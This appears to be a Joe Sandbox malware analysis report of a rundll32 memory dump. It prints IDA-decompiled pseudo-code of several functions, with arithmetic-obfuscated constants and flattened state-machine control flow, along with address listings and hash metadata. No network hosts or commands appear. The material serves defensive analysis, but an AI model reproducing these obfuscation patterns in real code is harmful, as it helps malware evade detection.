				 *(_t426 + 0x34) =  *(_t426 + 0x34) << 0xb;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) + 0xdf07;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) << 3;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) ^ 0xaac3765a;
				 *(_t426 + 0x68) = 0xbbaf5f;
				 *(_t426 + 0x68) =  *(_t426 + 0x68) >> 3;
				_t372 =  *(_t426 + 0x6c);
				_t411 =  *(_t426 + 0x6c);
				_t424 =  *(_t426 + 0x6c);
				_t420 =  *(_t426 + 0x6c);
				 *(_t426 + 0x68) =  *(_t426 + 0x68) * 0x7d;
				 *(_t426 + 0x68) =  *(_t426 + 0x68) ^ 0x0b7165e1;
				 *(_t426 + 0x74) = 0xfd4b1c;
				 *(_t426 + 0x74) =  *(_t426 + 0x74) + 0x7fb7;
				 *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x00f7158e;
				 *(_t426 + 0x88) = 0xbb9d8e;
				 *(_t426 + 0x88) =  *(_t426 + 0x88) * 0x48;
				 *(_t426 + 0x88) =  *(_t426 + 0x88) ^ 0x34cbdce1;
				 *(_t426 + 0x3c) = 0x9303e6;
				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) << 0xf;
				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) ^ 0xad47a309;
				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) * 0x3d;
				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) ^ 0xa7019983;
				 *(_t426 + 0x80) = 0xaf4918;
				 *(_t426 + 0x80) =  *(_t426 + 0x80) + 0x655a;
				 *(_t426 + 0x80) =  *(_t426 + 0x80) ^ 0x00a67f7b;
				 *(_t426 + 0x78) = 0xd8d1b1;
				 *(_t426 + 0x78) =  *(_t426 + 0x78) * 0x42;
				 *(_t426 + 0x78) =  *(_t426 + 0x78) ^ 0x37ebe9ce;
				while(1) {
					L1:
					_t347 = 0xfb52c5;
					L2:
					while(_t374 != 0xd963e9) {
						if(_t374 == _t347) {
							_t350 = E0038C264( *((intOrPtr*)(_t426 + 0xbc)), _t372,  *(_t426 + 0x3c), _t426 + 0xac,  *((intOrPtr*)(_t426 + 0xa4)), _t374, _t374, _t420,  *(_t426 + 0x68), _t374,  *(_t426 + 0x48),  *(_t426 + 0xa0), _t411);
							_t426 = _t426 + 0x2c;
							__eflags = _t350;
							if(_t350 == 0) {
								_t351 =  *(_t426 + 0xa0);
							} else {
								_t422 = _t411;
								while(1) {
									__eflags = _t422[1] - 4;
									if(_t422[1] != 4) {
										goto L20;
									}
									L19:
									_t355 = E0037B23C( *(_t426 + 0x38),  *(_t426 + 0x30), _t424,  *(_t426 + 0x94),  *(_t426 + 0x20),  &(_t422[3]));
									_t426 = _t426 + 0x10;
									__eflags = _t355;
									if(_t355 == 0) {
										_t351 = 1;
										 *(_t426 + 0xa0) = 1;
									} else {
										goto L20;
									}
									L25:
									_t420 =  *(_t426 + 0x6c);
									goto L26;
									L20:
									_t353 =  *_t422;
									__eflags = _t353;
									if(_t353 == 0) {
										_t351 =  *(_t426 + 0xa0);
									} else {
										_t422 = _t422 + _t353;
										__eflags = _t422[1] - 4;
										if(_t422[1] != 4) {
											goto L20;
										}
									}
									goto L25;
								}
							}
							L26:
							__eflags = _t351;
							if(__eflags == 0) {
								_t347 = 0xfb52c5;
								_t374 = 0xfb52c5;
								continue;
							} else {
								_t407 =  *0x393e0c; // 0x0
								E0038458F( *(_t426 + 0x64),  *((intOrPtr*)(_t407 + 8)),  *(_t426 + 0x34));
								_t374 = 0xd963e9;
								goto L1;
							}
							L32:
						} else {
							if(_t374 == 0x247652d) {
								_t360 = E00378F65( *(_t426 + 0x68),  *(_t426 + 0x34), _t426 + 0xb4,  *(_t426 + 0x9c), 0x2000000, _t374, 1,  *(_t426 + 0x80),  *((intOrPtr*)(_t426 + 0xa4)),  *(_t426 + 0x6c), _t374,  *(_t426 + 0x30) | 0x00000006);
								_t372 = _t360;
								_t426 = _t426 + 0x28;
								__eflags = _t360 - 0xffffffff;
								if(__eflags != 0) {
									_t374 = 0x7db0050;
									while(1) {
										L1:
										_t347 = 0xfb52c5;
										goto L2;
									}
								}
							} else {
								if(_t374 == 0x4334ccc) {
									E0038DA22( *(_t426 + 0x28),  *(_t426 + 0x64), __eflags,  *(_t426 + 0x68), _t426 + 0xac, _t374,  *(_t426 + 0x48));
									_t364 = E0037B6CF(_t426 + 0xbc,  *((intOrPtr*)(_t426 + 0xac)),  *(_t426 + 0x34),  *(_t426 + 0x48));
									_t424 = _t364;
									_t426 = _t426 + 0x18;
									_t374 = 0x247652d;
									 *((short*)(_t364 - 2)) = 0;
									while(1) {
										L1:
										_t347 = 0xfb52c5;
										goto L2;
									}
								} else {
									if(_t374 == 0x7db0050) {
										_t420 = 0x1000;
										_push(_t374);
										_push(_t374);
										 *(_t426 + 0x74) = 0x1000;
										_t411 = E00377FF2(0x1000);
										_t347 = 0xfb52c5;
										__eflags = _t411;
										_t374 =  !=  ? 0xfb52c5 : 0xf828486;
										continue;
									} else {
										if(_t374 == 0xebf23c2) {
											_t374 = 0x4334ccc;
											continue;
										} else {
											if(_t374 != 0xf828486) {
												L30:
												__eflags = _t374 - 0x24bb42a;
												if(__eflags != 0) {
													continue;
												} else {
												}
											} else {
												E00381E67( *(_t426 + 0x94),  *(_t426 + 0x48),  *(_t426 + 0x88),  *(_t426 + 0x7c), _t372);
											}
										}
									}
								}
							}
						}
						return 0;
						goto L32;
					}
					E00388519( *(_t426 + 0x68),  *(_t426 + 0x74), _t411);
					_t374 = 0xf828486;
					_t347 = 0xfb52c5;
					goto L30;
				}
			}






















                                                                                                                                                            0x003781bd
                                                                                                                                                            0x003781c7
                                                                                                                                                            0x003781cf
                                                                                                                                                            0x003781d4
                                                                                                                                                            0x003781dc
                                                                                                                                                            0x003781e4
                                                                                                                                                            0x003781f3
                                                                                                                                                            0x003781f8
                                                                                                                                                            0x003781fe
                                                                                                                                                            0x00378206
                                                                                                                                                            0x0037820e
                                                                                                                                                            0x00378219
                                                                                                                                                            0x00378224
                                                                                                                                                            0x0037822f
                                                                                                                                                            0x00378237
                                                                                                                                                            0x0037823c
                                                                                                                                                            0x00378241
                                                                                                                                                            0x00378246
                                                                                                                                                            0x0037824e
                                                                                                                                                            0x0037825b
                                                                                                                                                            0x0037825c
                                                                                                                                                            0x00378264
                                                                                                                                                            0x00378268
                                                                                                                                                            0x00378270
                                                                                                                                                            0x00378278
                                                                                                                                                            0x00378280
                                                                                                                                                            0x0037828e
                                                                                                                                                            0x00378292
                                                                                                                                                            0x0037829a
                                                                                                                                                            0x003782a2
                                                                                                                                                            0x003782aa
                                                                                                                                                            0x003782af
                                                                                                                                                            0x003782b7
                                                                                                                                                            0x003782c2
                                                                                                                                                            0x003782ca
                                                                                                                                                            0x003782d5
                                                                                                                                                            0x003782dd
                                                                                                                                                            0x003782e2
                                                                                                                                                            0x003782ea
                                                                                                                                                            0x003782f2
                                                                                                                                                            0x003782fa
                                                                                                                                                            0x00378307
                                                                                                                                                            0x0037830b
                                                                                                                                                            0x00378313
                                                                                                                                                            0x0037831b
                                                                                                                                                            0x00378323
                                                                                                                                                            0x0037832b
                                                                                                                                                            0x00378333
                                                                                                                                                            0x00378338
                                                                                                                                                            0x00378340
                                                                                                                                                            0x00378348
                                                                                                                                                            0x00378355
                                                                                                                                                            0x00378359
                                                                                                                                                            0x00378361
                                                                                                                                                            0x00378369
                                                                                                                                                            0x00378371
                                                                                                                                                            0x00378376
                                                                                                                                                            0x0037837e
                                                                                                                                                            0x00378386
                                                                                                                                                            0x0037838b
                                                                                                                                                            0x00378393
                                                                                                                                                            0x0037839b
                                                                                                                                                            0x003783a8
                                                                                                                                                            0x003783ac
                                                                                                                                                            0x003783b4
                                                                                                                                                            0x003783bc
                                                                                                                                                            0x003783c6
                                                                                                                                                            0x003783ce
                                                                                                                                                            0x003783d6
                                                                                                                                                            0x003783de
                                                                                                                                                            0x003783e6
                                                                                                                                                            0x003783eb
                                                                                                                                                            0x003783f3
                                                                                                                                                            0x003783fb
                                                                                                                                                            0x00378403
                                                                                                                                                            0x00378412
                                                                                                                                                            0x00378415
                                                                                                                                                            0x00378419
                                                                                                                                                            0x00378421
                                                                                                                                                            0x0037842c
                                                                                                                                                            0x00378437
                                                                                                                                                            0x00378442
                                                                                                                                                            0x0037844a
                                                                                                                                                            0x0037844f
                                                                                                                                                            0x00378457
                                                                                                                                                            0x0037845f
                                                                                                                                                            0x00378467
                                                                                                                                                            0x0037846f
                                                                                                                                                            0x0037847f
                                                                                                                                                            0x00378483
                                                                                                                                                            0x0037848b
                                                                                                                                                            0x00378493
                                                                                                                                                            0x0037849b
                                                                                                                                                            0x003784a0
                                                                                                                                                            0x003784a8
                                                                                                                                                            0x003784bb
                                                                                                                                                            0x003784be
                                                                                                                                                            0x003784c5
                                                                                                                                                            0x003784d0
                                                                                                                                                            0x003784e0
                                                                                                                                                            0x003784e4
                                                                                                                                                            0x003784ec
                                                                                                                                                            0x003784f4
                                                                                                                                                            0x003784fc
                                                                                                                                                            0x00378504
                                                                                                                                                            0x00378510
                                                                                                                                                            0x00378515
                                                                                                                                                            0x0037851b
                                                                                                                                                            0x00378520
                                                                                                                                                            0x00378528
                                                                                                                                                            0x00378533
                                                                                                                                                            0x0037853e
                                                                                                                                                            0x00378549
                                                                                                                                                            0x00378555
                                                                                                                                                            0x00378558
                                                                                                                                                            0x0037855c
                                                                                                                                                            0x00378561
                                                                                                                                                            0x00378566
                                                                                                                                                            0x0037856e
                                                                                                                                                            0x00378576
                                                                                                                                                            0x00378580
                                                                                                                                                            0x00378584
                                                                                                                                                            0x0037858c
                                                                                                                                                            0x00378594
                                                                                                                                                            0x00378599
                                                                                                                                                            0x003785a1
                                                                                                                                                            0x003785a6
                                                                                                                                                            0x003785ae
                                                                                                                                                            0x003785b6
                                                                                                                                                            0x003785c0
                                                                                                                                                            0x003785c4
                                                                                                                                                            0x003785c8
                                                                                                                                                            0x003785cc
                                                                                                                                                            0x003785d0
                                                                                                                                                            0x003785d4
                                                                                                                                                            0x003785dc
                                                                                                                                                            0x003785e4
                                                                                                                                                            0x003785ec
                                                                                                                                                            0x003785f4
                                                                                                                                                            0x00378607
                                                                                                                                                            0x0037860e
                                                                                                                                                            0x00378619
                                                                                                                                                            0x00378621
                                                                                                                                                            0x00378626
                                                                                                                                                            0x00378633
                                                                                                                                                            0x00378637
                                                                                                                                                            0x0037863f
                                                                                                                                                            0x0037864a
                                                                                                                                                            0x00378655
                                                                                                                                                            0x00378660
                                                                                                                                                            0x0037866d
                                                                                                                                                            0x00378671
                                                                                                                                                            0x00378679
                                                                                                                                                            0x00378679
                                                                                                                                                            0x00378679
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037867e
                                                                                                                                                            0x0037868c
                                                                                                                                                            0x00378806
                                                                                                                                                            0x0037880b
                                                                                                                                                            0x0037880e
                                                                                                                                                            0x00378810
                                                                                                                                                            0x00378854
                                                                                                                                                            0x00378812
                                                                                                                                                            0x00378812
                                                                                                                                                            0x00378814
                                                                                                                                                            0x00378814
                                                                                                                                                            0x00378818
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037881a
                                                                                                                                                            0x00378832
                                                                                                                                                            0x00378837
                                                                                                                                                            0x0037883a
                                                                                                                                                            0x0037883c
                                                                                                                                                            0x0037884a
                                                                                                                                                            0x0037884b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00378864
                                                                                                                                                            0x00378864
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037883e
                                                                                                                                                            0x0037883e
                                                                                                                                                            0x00378840
                                                                                                                                                            0x00378842
                                                                                                                                                            0x0037885d
                                                                                                                                                            0x00378844
                                                                                                                                                            0x00378844
                                                                                                                                                            0x00378814
                                                                                                                                                            0x00378818
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00378818
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00378842
                                                                                                                                                            0x00378814
                                                                                                                                                            0x00378868
                                                                                                                                                            0x00378868
                                                                                                                                                            0x0037886a
                                                                                                                                                            0x0037888d
                                                                                                                                                            0x00378892
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037886c
                                                                                                                                                            0x00378870
                                                                                                                                                            0x0037887d
                                                                                                                                                            0x00378883
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00378883
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00378692
                                                                                                                                                            0x00378698
                                                                                                                                                            0x003787b9
                                                                                                                                                            0x003787be
                                                                                                                                                            0x003787c0
                                                                                                                                                            0x003787c3
                                                                                                                                                            0x003787c6
                                                                                                                                                            0x003787cc
                                                                                                                                                            0x00378679
                                                                                                                                                            0x00378679
                                                                                                                                                            0x00378679
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00378679
                                                                                                                                                            0x00378679
                                                                                                                                                            0x0037869e
                                                                                                                                                            0x003786a4
                                                                                                                                                            0x0037874a
                                                                                                                                                            0x00378765
                                                                                                                                                            0x0037876a
                                                                                                                                                            0x0037876c
                                                                                                                                                            0x00378771
                                                                                                                                                            0x00378776
                                                                                                                                                            0x00378679
                                                                                                                                                            0x00378679
                                                                                                                                                            0x00378679
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00378679
                                                                                                                                                            0x003786aa
                                                                                                                                                            0x003786b0
                                                                                                                                                            0x003786ff
                                                                                                                                                            0x0037870e
                                                                                                                                                            0x0037870f
                                                                                                                                                            0x00378710
                                                                                                                                                            0x0037871a
                                                                                                                                                            0x0037871c
                                                                                                                                                            0x00378722
                                                                                                                                                            0x00378729
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003786b2
                                                                                                                                                            0x003786b8
                                                                                                                                                            0x003786f4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003786ba
                                                                                                                                                            0x003786c0
                                                                                                                                                            0x003788b2
                                                                                                                                                            0x003788b2
                                                                                                                                                            0x003788b8
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003788be
                                                                                                                                                            0x003786c6
                                                                                                                                                            0x003786dd
                                                                                                                                                            0x003786e2
                                                                                                                                                            0x003786c0
                                                                                                                                                            0x003786b8
                                                                                                                                                            0x003786b0
                                                                                                                                                            0x003786a4
                                                                                                                                                            0x00378698
                                                                                                                                                            0x003786f1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003786f1
                                                                                                                                                            0x003788a2
                                                                                                                                                            0x003788a8
                                                                                                                                                            0x003788ad
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003788ad

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: Q$/&X$Lz$N'`$S,I$Ze$q_
                                                                                                                                                            • API String ID: 0-1837206032
                                                                                                                                                            • Opcode ID: 49e0db30fb76e32c75271f770a3bc1bdb804308cc4186c8326f62802508ffa6d
                                                                                                                                                            • Instruction ID: f7741ea3084bd1704baac270c7541f984e5f5213e8bf08680663cc5c99daba16
                                                                                                                                                            • Opcode Fuzzy Hash: 49e0db30fb76e32c75271f770a3bc1bdb804308cc4186c8326f62802508ffa6d
                                                                                                                                                            • Instruction Fuzzy Hash: 7F022F711083809FD369CF25C48AA5FBBE1FBC4758F508A1DF69A86260DBB49949CF43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 0037E5CF Relevance: 9.0, Strings: 7, Instructions: 204COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                            			E0037E5CF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				void* _t170;
				void* _t181;
				void* _t184;
				void* _t189;
				void* _t192;
				void* _t195;
				void* _t197;
				void* _t220;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int* _t226;

				_push(_a8);
				_t219 = _a4;
				_t195 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003820B9(_t170);
				_v56 = 0xa4c651;
				_t226 =  &(( &_v116)[4]);
				_v56 = _v56 ^ 0x6a6d8bac;
				_v56 = _v56 ^ 0x6ac6bd64;
				_t220 = 0;
				_v60 = 0xbac055;
				_t197 = 0xf39239f;
				_v60 = _v60 << 0xd;
				_v60 = _v60 ^ 0x580542e6;
				_v108 = 0xd580f5;
				_v108 = _v108 ^ 0x97cdda0d;
				_v108 = _v108 + 0x37dd;
				_v108 = _v108 >> 0xe;
				_v108 = _v108 ^ 0x00021113;
				_v52 = 0xf28435;
				_v52 = _v52 | 0x057a1a90;
				_v52 = _v52 ^ 0x05fdc129;
				_v80 = 0x5c8bc8;
				_t221 = 0x27;
				_v80 = _v80 / _t221;
				_t222 = 0x1b;
				_v80 = _v80 * 9;
				_v80 = _v80 ^ 0x0013f028;
				_v96 = 0x281d9a;
				_v96 = _v96 + 0xffff8f77;
				_v96 = _v96 + 0x4719;
				_v96 = _v96 << 0xf;
				_v96 = _v96 ^ 0xfa152b1c;
				_v112 = 0x7415d8;
				_v112 = _v112 >> 0xf;
				_v112 = _v112 + 0xfffff76c;
				_v112 = _v112 >> 0xd;
				_v112 = _v112 ^ 0x000d779a;
				_v88 = 0xb68707;
				_v88 = _v88 ^ 0x45e0ecf4;
				_v88 = _v88 + 0xffff71c0;
				_v88 = _v88 ^ 0x455519c2;
				_v116 = 0xceabf6;
				_v116 = _v116 + 0x1225;
				_v116 = _v116 / _t222;
				_v116 = _v116 >> 6;
				_v116 = _v116 ^ 0x0006e3bb;
				_v84 = 0xd525a4;
				_v84 = _v84 + 0xffff1243;
				_v84 = _v84 + 0x1c30;
				_v84 = _v84 ^ 0x00df7efc;
				_v100 = 0xf29ecf;
				_v100 = _v100 << 0xc;
				_v100 = _v100 + 0xffff4e95;
				_v100 = _v100 ^ 0x70d6065d;
				_v100 = _v100 ^ 0x593d89f0;
				_v104 = 0x2206c6;
				_v104 = _v104 | 0x38687435;
				_v104 = _v104 ^ 0xadcf411b;
				_v104 = _v104 ^ 0x9549ac77;
				_v104 = _v104 ^ 0x00e3f730;
				_v92 = 0xd38a43;
				_v92 = _v92 >> 3;
				_v92 = _v92 + 0x6fd1;
				_v92 = _v92 ^ 0x0012c73c;
				_v64 = 0x625266;
				_v64 = _v64 + 0x2436;
				_v64 = _v64 ^ 0x006987c3;
				_v68 = 0xe296bd;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0x52d9a139;
				_v72 = 0x54a2fd;
				_v72 = _v72 << 0xd;
				_v72 = _v72 >> 0xa;
				_v72 = _v72 ^ 0x002b3e4c;
				_v76 = 0x32cdcd;
				_v76 = _v76 << 0xb;
				_t223 = 0x32;
				_v76 = _v76 / _t223;
				_v76 = _v76 ^ 0x0302c408;
				_v48 = 0x2d2164;
				_v48 = _v48 + 0xfffff0e0;
				_v48 = _v48 ^ 0x0021ab5a;
				do {
					while(_t197 != 0x2168849) {
						if(_t197 == 0x29fa3de) {
							_t184 = E00372A21(_v84, _v100,  &_v44, _t219 + 0x20, _v104);
							_t226 =  &(_t226[3]);
							__eflags = _t184;
							if(__eflags != 0) {
								_t197 = 0x74ac459;
								continue;
							}
						} else {
							if(_t197 == 0x545de14) {
								E00373DBC( &_v44, _t195, _v56, _v60, _v108);
								_t226 =  &(_t226[3]);
								_t197 = 0x2168849;
								continue;
							} else {
								if(_t197 == 0x6ab10c5) {
									_t189 = E00372A21(_v112, _v88,  &_v44, _t219 + 0x1c, _v116);
									_t226 =  &(_t226[3]);
									__eflags = _t189;
									if(__eflags != 0) {
										_t197 = 0x29fa3de;
										continue;
									}
								} else {
									if(_t197 == 0x74ac459) {
										_t192 = E00372A21(_v92, _v64,  &_v44, _t219 + 0x28, _v68);
										_t226 =  &(_t226[3]);
										__eflags = _t192;
										if(__eflags != 0) {
											_t197 = 0x9dbfb8a;
											continue;
										}
									} else {
										if(_t197 == 0x9dbfb8a) {
											__eflags = E0038D97D( &_v44, _v72, __eflags, _v76, _t219 + 4, _v48);
											_t220 =  !=  ? 1 : _t220;
											__eflags = _t220;
										} else {
											if(_t197 != 0xf39239f) {
												goto L19;
											} else {
												_t197 = 0x545de14;
												continue;
											}
										}
									}
								}
							}
						}
						L22:
						return _t220;
					}
					_t181 = E00372A21(_v52, _v80,  &_v44, _t219 + 0x14, _v96);
					_t226 =  &(_t226[3]);
					__eflags = _t181;
					if(__eflags == 0) {
						_t197 = 0x90a774d;
						goto L19;
					} else {
						_t197 = 0x6ab10c5;
						continue;
					}
					goto L22;
					L19:
					__eflags = _t197 - 0x90a774d;
				} while (__eflags != 0);
				goto L22;
			}


































                                                                                                                                                            0x0037e5d6
                                                                                                                                                            0x0037e5dd
                                                                                                                                                            0x0037e5e4
                                                                                                                                                            0x0037e5e6
                                                                                                                                                            0x0037e5e7
                                                                                                                                                            0x0037e5e8
                                                                                                                                                            0x0037e5e9
                                                                                                                                                            0x0037e5ee
                                                                                                                                                            0x0037e5f6
                                                                                                                                                            0x0037e5f9
                                                                                                                                                            0x0037e603
                                                                                                                                                            0x0037e60b
                                                                                                                                                            0x0037e60d
                                                                                                                                                            0x0037e615
                                                                                                                                                            0x0037e61a
                                                                                                                                                            0x0037e61f
                                                                                                                                                            0x0037e627
                                                                                                                                                            0x0037e62f
                                                                                                                                                            0x0037e637
                                                                                                                                                            0x0037e63f
                                                                                                                                                            0x0037e644
                                                                                                                                                            0x0037e64c
                                                                                                                                                            0x0037e654
                                                                                                                                                            0x0037e65c
                                                                                                                                                            0x0037e664
                                                                                                                                                            0x0037e672
                                                                                                                                                            0x0037e677
                                                                                                                                                            0x0037e682
                                                                                                                                                            0x0037e683
                                                                                                                                                            0x0037e687
                                                                                                                                                            0x0037e68f
                                                                                                                                                            0x0037e697
                                                                                                                                                            0x0037e69f
                                                                                                                                                            0x0037e6a7
                                                                                                                                                            0x0037e6ac
                                                                                                                                                            0x0037e6b4
                                                                                                                                                            0x0037e6bc
                                                                                                                                                            0x0037e6c1
                                                                                                                                                            0x0037e6c9
                                                                                                                                                            0x0037e6ce
                                                                                                                                                            0x0037e6d6
                                                                                                                                                            0x0037e6de
                                                                                                                                                            0x0037e6e6
                                                                                                                                                            0x0037e6ee
                                                                                                                                                            0x0037e6f6
                                                                                                                                                            0x0037e6fe
                                                                                                                                                            0x0037e70c
                                                                                                                                                            0x0037e710
                                                                                                                                                            0x0037e715
                                                                                                                                                            0x0037e71d
                                                                                                                                                            0x0037e725
                                                                                                                                                            0x0037e72d
                                                                                                                                                            0x0037e735
                                                                                                                                                            0x0037e73d
                                                                                                                                                            0x0037e745
                                                                                                                                                            0x0037e74a
                                                                                                                                                            0x0037e752
                                                                                                                                                            0x0037e75a
                                                                                                                                                            0x0037e762
                                                                                                                                                            0x0037e76a
                                                                                                                                                            0x0037e772
                                                                                                                                                            0x0037e77a
                                                                                                                                                            0x0037e782
                                                                                                                                                            0x0037e78a
                                                                                                                                                            0x0037e792
                                                                                                                                                            0x0037e797
                                                                                                                                                            0x0037e79f
                                                                                                                                                            0x0037e7a7
                                                                                                                                                            0x0037e7af
                                                                                                                                                            0x0037e7b9
                                                                                                                                                            0x0037e7c1
                                                                                                                                                            0x0037e7c9
                                                                                                                                                            0x0037e7ce
                                                                                                                                                            0x0037e7d6
                                                                                                                                                            0x0037e7de
                                                                                                                                                            0x0037e7e3
                                                                                                                                                            0x0037e7e8
                                                                                                                                                            0x0037e7f0
                                                                                                                                                            0x0037e7f8
                                                                                                                                                            0x0037e803
                                                                                                                                                            0x0037e80b
                                                                                                                                                            0x0037e80f
                                                                                                                                                            0x0037e817
                                                                                                                                                            0x0037e81f
                                                                                                                                                            0x0037e827
                                                                                                                                                            0x0037e82f
                                                                                                                                                            0x0037e82f
                                                                                                                                                            0x0037e83d
                                                                                                                                                            0x0037e90f
                                                                                                                                                            0x0037e914
                                                                                                                                                            0x0037e917
                                                                                                                                                            0x0037e919
                                                                                                                                                            0x0037e91b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037e91b
                                                                                                                                                            0x0037e843
                                                                                                                                                            0x0037e849
                                                                                                                                                            0x0037e8e8
                                                                                                                                                            0x0037e8ed
                                                                                                                                                            0x0037e8f0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037e84f
                                                                                                                                                            0x0037e855
                                                                                                                                                            0x0037e8bf
                                                                                                                                                            0x0037e8c4
                                                                                                                                                            0x0037e8c7
                                                                                                                                                            0x0037e8c9
                                                                                                                                                            0x0037e8cf
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037e8cf
                                                                                                                                                            0x0037e857
                                                                                                                                                            0x0037e85d
                                                                                                                                                            0x0037e893
                                                                                                                                                            0x0037e898
                                                                                                                                                            0x0037e89b
                                                                                                                                                            0x0037e89d
                                                                                                                                                            0x0037e8a3
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037e8a3
                                                                                                                                                            0x0037e85f
                                                                                                                                                            0x0037e865
                                                                                                                                                            0x0037e982
                                                                                                                                                            0x0037e984
                                                                                                                                                            0x0037e984
                                                                                                                                                            0x0037e86b
                                                                                                                                                            0x0037e871
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037e877
                                                                                                                                                            0x0037e877
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037e877
                                                                                                                                                            0x0037e871
                                                                                                                                                            0x0037e865
                                                                                                                                                            0x0037e85d
                                                                                                                                                            0x0037e855
                                                                                                                                                            0x0037e849
                                                                                                                                                            0x0037e988
                                                                                                                                                            0x0037e990
                                                                                                                                                            0x0037e990
                                                                                                                                                            0x0037e93a
                                                                                                                                                            0x0037e93f
                                                                                                                                                            0x0037e942
                                                                                                                                                            0x0037e944
                                                                                                                                                            0x0037e950
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037e946
                                                                                                                                                            0x0037e946
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037e946
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037e955
                                                                                                                                                            0x0037e955
                                                                                                                                                            0x0037e955
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 5th8$6$$L>+$Mw$Mw$d!-$fRb
                                                                                                                                                            • API String ID: 0-2045295228
                                                                                                                                                            • Opcode ID: 6f2f31d65536ce47fea8f5922934b6de45e61ae0ad55fa75fcdf554af6f56bec
                                                                                                                                                            • Instruction ID: a32681dbc8afda384df46331e1a9f441ae21d89d419da057b6942d68d3562eab
                                                                                                                                                            • Opcode Fuzzy Hash: 6f2f31d65536ce47fea8f5922934b6de45e61ae0ad55fa75fcdf554af6f56bec
                                                                                                                                                            • Instruction Fuzzy Hash: 279177B2508341ABC7A5CE61C88941BFBF9FBD8758F00891DF58696220D7B5DA19CF83
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 0037E2CC Relevance: 8.9, Strings: 7, Instructions: 178COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                            			E0037E2CC(void* __edx, intOrPtr _a8, intOrPtr _a12) {
				char _v556;
				intOrPtr _v576;
				char _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				void* __ecx;
				void* _t136;
				void* _t151;
				signed int _t153;
				signed int _t156;
				void* _t162;
				signed int _t167;
				intOrPtr _t187;
				signed int _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int* _t196;

				_push(_a12);
				_t187 = _a8;
				_push(_t187);
				_push(E00378E4D);
				_push(__edx);
				E003820B9(_t136);
				_v608 = 0x1ac257;
				_t196 =  &(( &_v652)[5]);
				_v608 = _v608 ^ 0x78a3296c;
				_v608 = _v608 ^ 0x78b9eb39;
				_t162 = 0xac58df2;
				_v624 = 0x387e66;
